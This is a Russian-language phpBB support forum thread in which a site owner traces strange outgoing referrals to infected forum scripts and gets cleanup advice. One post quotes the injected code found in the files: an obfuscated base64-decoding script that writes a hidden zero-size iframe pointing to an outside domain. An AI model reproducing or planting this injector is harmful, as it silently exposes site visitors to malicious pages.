Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

странные переходы из форума.

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
ps7
phpBB 1.4.4
Сообщения: 138
Стаж: 9 лет 2 месяца
Благодарил (а): 3 раза
Поблагодарили: 2 раза

странные переходы из форума.

Сообщение ps7 »

всем привет!

на форуме установлен счетчик liveinternet
смотрю его периодически, раздел "переходы на сайты", чтобы вычислить рекламщиков и т.п...

и тут обнаружил странные сайты... см.картинку
странные переходы.jpg
странные переходы.jpg (4.01 КБ) 515 просмотров
это переходы на них за месяц.. адреса этих сайтов не ищутся поиском форума , то есть сообщения с такими ссылками не находятся.
зайти на эти сайты не получается.. но переходы есть ! откуда они берутся ??!! и что это за сайты?
Аватара пользователя
southklad
phpBB 3.1.0 RC2
Сообщения: 3232
Стаж: 12 лет 2 месяца
Благодарил (а): 797 раз
Поблагодарили: 175 раз

Re: странные переходы из форума.

Сообщение southklad »

из профилей может быть или подписей.
Изображение
ps7
phpBB 1.4.4
Сообщения: 138
Стаж: 9 лет 2 месяца
Благодарил (а): 3 раза
Поблагодарили: 2 раза

Re: странные переходы из форума.

Сообщение ps7 »

а разве если в подписи был бы написан сайт, его не было бы в поиске? ну и опять же что за странные сайты? они "пустые"... по этим адресам ничего не открывается

в профиле точно нет, какие сайты там пишут - я контролирую в списке пользователей доп.колонка, все видно сразу
Аватара пользователя
Balamut
Former team member
Сообщения: 2213
Стаж: 19 лет
Откуда: {postrow.POSTER_FROM}
Поблагодарили: 146 раз
Контактная информация:

Re: странные переходы из форума.

Сообщение Balamut »

Сдаётся мне, что поцепили вы каку. Лечиться пора.

Убейте все куки и кэш на компе, убейте браузер и все расширения на него, переустановите браузер (чистый), проверьте все файлы на сервере на вставку всяких фреймов.
И комп свой проверьте. И пусть проверят те, кто имеет доступ к фтп.

Как правило, это всё же браузер заражён. Раньше этим Хром страдал большей частью, сейчас не знаю.
//
// That's all, Folks!
// -------------------------------------------------
ps7
phpBB 1.4.4
Сообщения: 138
Стаж: 9 лет 2 месяца
Благодарил (а): 3 раза
Поблагодарили: 2 раза

Re: странные переходы из форума.

Сообщение ps7 »

то есть Вы считаете что это переходы с моего браузера идут? ( firefox )
может у кого-то из пользователей заражен браузер?
(и, кстати, недавно была жалоба, гуглхром показывал рекламу поверх моего форума у одного юзера - он потом лечил на вирусы комп...)

к фтп только я имею доступ. хостинг крупный серьезный.. не думаю что они не следят за вирусами...
Аватара пользователя
Balamut
Former team member
Сообщения: 2213
Стаж: 19 лет
Откуда: {postrow.POSTER_FROM}
Поблагодарили: 146 раз
Контактная информация:

Re: странные переходы из форума.

Сообщение Balamut »

Проверяйте скрипты движка, либо доступ к ФТП мне в личку.

Отправлено спустя 1 минуту 58 секунд:
ps7, или, хотя бы, ссылку на сайт.

Честно-честно, по фотографии только 2.0.4 лечу. Там с аутентификацией проблемы, поломать можно было подменой куков.
//
// That's all, Folks!
// -------------------------------------------------
ps7
phpBB 1.4.4
Сообщения: 138
Стаж: 9 лет 2 месяца
Благодарил (а): 3 раза
Поблагодарили: 2 раза

Re: странные переходы из форума.

Сообщение ps7 »

добрый день! приключения продолжаются...
озадачился я этой проблемой...
решил сделать самое простое - скопировать скрипты форума к себе на комп.. и тут запищал антивирус.. обнаружился вирус в нескольких скриптах. он эти файлы в карантин. файлы эти - часть модуля "благодарности/лайки" исходники брались по ссылкам с этого ресурса... модуль постоянно в работе.. как вылечить??? обращаться к хостингу??? прилагаю картинки. заранее спасибо
Вложения
Image4.jpg
Image3.jpg
Image3.jpg (20.39 КБ) 349 просмотров
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 16313
Стаж: 17 лет 10 месяцев
Откуда: Красноярск
Благодарил (а): 533 раза
Поблагодарили: 2119 раз
Контактная информация:

Re: странные переходы из форума.

Сообщение rxu »

Изображение
ps7
phpBB 1.4.4
Сообщения: 138
Стаж: 9 лет 2 месяца
Благодарил (а): 3 раза
Поблагодарили: 2 раза

Re: странные переходы из форума.

Сообщение ps7 »

Спасибо.... честно говоря озадачен, какие файлы восстанавливать ... от основной коробки?.. или все таки это от установленного мода (благодарности/лайки) файлы.. мне все это дело когда-то спец устанавливал...

если озадачить хостера, они не могут все испортить? не знаю как они это делают, может тупо запустят свой антивирус и он поудаляет либо некорректно "полечит" файлы и меня форум встанет?

п.с.
пароли в ФАРе не храню... при подключении к ФТП копи пастю из другого файла. поэтому озадачился как он туда попал?
переходы идут вот на этот сайт - uniontraff.com не могли они к этому заражению руку преложить?
Аватара пользователя
southklad
phpBB 3.1.0 RC2
Сообщения: 3232
Стаж: 12 лет 2 месяца
Благодарил (а): 797 раз
Поблагодарили: 175 раз

Re: странные переходы из форума.

Сообщение southklad »

ну скиньте ссылку на сайт посмотрим на переходы ваши
Изображение
ps7
phpBB 1.4.4
Сообщения: 138
Стаж: 9 лет 2 месяца
Благодарил (а): 3 раза
Поблагодарили: 2 раза

Re: странные переходы из форума.

Сообщение ps7 »

поменял пароли от фтп.

вобщем в этих файлах обнаружилась вот такая добавочка... надеюсь то что я ее сюда вставлю никому это не навредит?..
заменил на чистые файлы из "коробки"... посмотрю что дальше будет... в самих базах он нигде не мог прописаться?..
<body bgcolor="#FFFFFF" text="#000000">

<!-- o65 --><script>function pc67bfc72c(pc){var u3='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var q2='';var uc,s6,tc,y7,ra,x3,t4;var n4=0;do{y7=u3.indexOf(pc.charAt(n4++));ra=u3.indexOf(pc.charAt(n4++));x3=u3.indexOf(pc.charAt(n4++));t4=u3.indexOf(pc.charAt(n4++));uc=(y7<<2)|(ra>>4);s6=((ra&15)<<4)|(x3>>2);tc=((x3&3)<<6)|t4;if(uc>=192)uc+=848;else if(uc==168)uc=1025;else if(uc==184)uc=1105;q2+=String.fromCharCode(uc);if(x3!=64){if(s6>=192)s6+=848;else if(s6==168)s6=1025;else if(s6==184)s6=1105;q2+=String.fromCharCode(s6);}if(t4!=64){if(tc>=192)tc+=848;else if(tc==168)tc=1025;else if(tc==184)tc=1105;q2+=String.fromCharCode(tc);}}while(n4<pc.length);document.write(q2);};pc67bfc72c('PGRpdiBzdHlsZT0idmlzaWJpbGl0eTpoaWRkZW4iPjxpZnJhbWUgc3JjPSJodHRwOi8vYWxsZXZvcnVuLmJpei9rb2tvdnMvc3Y3NzcvaW5kZXgucGhwIiB3aWR0aD0wIGhlaWdodD0wPjwvaWZyYW1lPjwvZGl2PgAA');</script><!-- c65 --></body>
на этом же хостинге был размещен старый заброщенный форум дык у него тоже были пара файлов с таким же скриптом и переходы на тот же юнионтрафф.ком
Аватара пользователя
southklad
phpBB 3.1.0 RC2
Сообщения: 3232
Стаж: 12 лет 2 месяца
Благодарил (а): 797 раз
Поблагодарили: 175 раз

Re: странные переходы из форума.

Сообщение southklad »

ps7, возможно в самом хостинге дыры
Изображение
ps7
phpBB 1.4.4
Сообщения: 138
Стаж: 9 лет 2 месяца
Благодарил (а): 3 раза
Поблагодарили: 2 раза

Re: странные переходы из форума.

Сообщение ps7 »

имелось с в виду что на моей же площадке было 2 сайта, один из которых заброшен и его форум тоже пострадал.
ps7
phpBB 1.4.4
Сообщения: 138
Стаж: 9 лет 2 месяца
Благодарил (а): 3 раза
Поблагодарили: 2 раза

Re: странные переходы из форума.

Сообщение ps7 »

нда... не долго радовался . сегодня опять этот сайт появился в исходящем траффике.... может ФАР дырявый?
на ФТП захожу только через него... пароли в нем не храню, антивирус на него не ругается...

проделал те же самые процедуры - скопировал скрипты на комп, антивирус при этом не ругался... посмотрел те же файлы где раньше была бяка - чистые! либо все таки в прошлый раз я убил не тот вирус..

как все таки отловить откуда идут переходы , неужели через личку кто-то спамит, а юзеры переходят по ссылкам этого юнионтраффа?
apograph
phpBB 1.4.3
Сообщения: 82
Стаж: 6 лет 11 месяцев
Благодарил (а): 4 раза
Поблагодарили: 18 раз

Re: странные переходы из форума.

Сообщение apograph »

Пора переходить на тотал коммандер уж тогда ;)
Может хостера сменить?
Ответить

Вернуться в «phpBB-пространство»